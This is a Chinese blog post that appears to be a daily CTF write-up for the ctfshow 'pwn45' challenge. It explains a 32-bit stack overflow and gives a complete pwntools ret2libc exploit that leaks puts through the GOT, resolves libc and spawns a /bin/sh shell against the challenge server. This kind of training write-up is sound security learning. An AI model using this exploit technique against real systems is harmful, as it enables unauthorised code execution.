每日一Pwn 2024/12/4
G3rling
|
|
每日一Pwn
|
11
|
0
|

pwn45

32位 无 system 无 "/bin/sh"

检查保护,只开了代码执行保护

image-20241204205357908

检查程序,发现溢出点

ssize_t ctfshow()
{
  char buf[103]; // [esp+Dh] [ebp-6Bh] BYREF

  return read(0, buf, 0xC8u);
}

这里查询函数地址,可以看到put@plt的地址已知,这里可以打32位的ret2libc

image-20241204205821895

32ret2libc

和64位的大差不大,主要区别在参数的传递和puts地址的接收上

from pwn import *
from LibcSearcher import *

io = remote('',)
# io = process("")
elf = ELF('')
# libc= ELF('libc.so.6')

main_add = 
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

print("Puts_got: ",hex(puts_got))
print("Puts_plt: ",hex(puts_plt))

offset=

payload1 = b'a' * (offset+4) + p32(puts_plt) + p32(main_add) + p32(puts_got)
io.sendafter(b'', payload1)
puts_addr = u32(io.recvuntil(b'\xf7')[-4:])
print("Puts_addr: ",hex(puts_addr))

libc = LibcSearcher('puts',puts_addr)

libc_base = puts_addr - libc.dump('puts')
system_add = libc_base + libc.dump('system')
bin_sh_add = libc_base + libc.dump('str_bin_sh')

# libc_base = puts_addr - libc.symbols['puts']
# system_add = libc_base + libc.symbols['system']
# bin_sh_add = libc_base + next(libc.search(b'/bin/sh'))

payload2 = b'a' * (offset+4) + p32(system_add) + p32(0) + p32(bin_sh_add)
io.sendafter(b'', payload2)

io.interactive()

查找相应地址以及参数填入

from pwn import *
from LibcSearcher import *

io = remote('pwn.challenge.ctf.show',28305)
# io = process("./pwn")
elf = ELF('./pwn')
# libc= ELF('libc.so.6')

main_add = 0x0804866D
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

print("Puts_got: ",hex(puts_got))
print("Puts_plt: ",hex(puts_plt))

offset=0x6B

payload1 = b'a' * (offset+4) + p32(puts_plt) + p32(main_add) + p32(puts_got)
io.sendafter(b'O.o?', payload1)
puts_addr = u32(io.recvuntil(b'\xf7')[-4:])
print("Puts_addr: ",hex(puts_addr))

libc = LibcSearcher('puts',puts_addr)   # libc6-i386_2.27-3ubuntu1_amd64

libc_base = puts_addr - libc.dump('puts')
system_add = libc_base + libc.dump('system')
bin_sh_add = libc_base + libc.dump('str_bin_sh')

# libc_base = puts_addr - libc.symbols['puts']
# system_add = libc_base + libc.symbols['system']
# bin_sh_add = libc_base + next(libc.search(b'/bin/sh'))

payload2 = b'a' * (offset+4) + p32(system_add) + p32(0) + p32(bin_sh_add)

io.sendafter(b'O.o?', payload2)

io.interactive()

很难评,本地和远程环境不一样……

暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇

                    

                    
			        推荐文章
		            

		            

							
每日一Pwn 2024/12/3

							
							

							
每日一Pwn 2024/12/2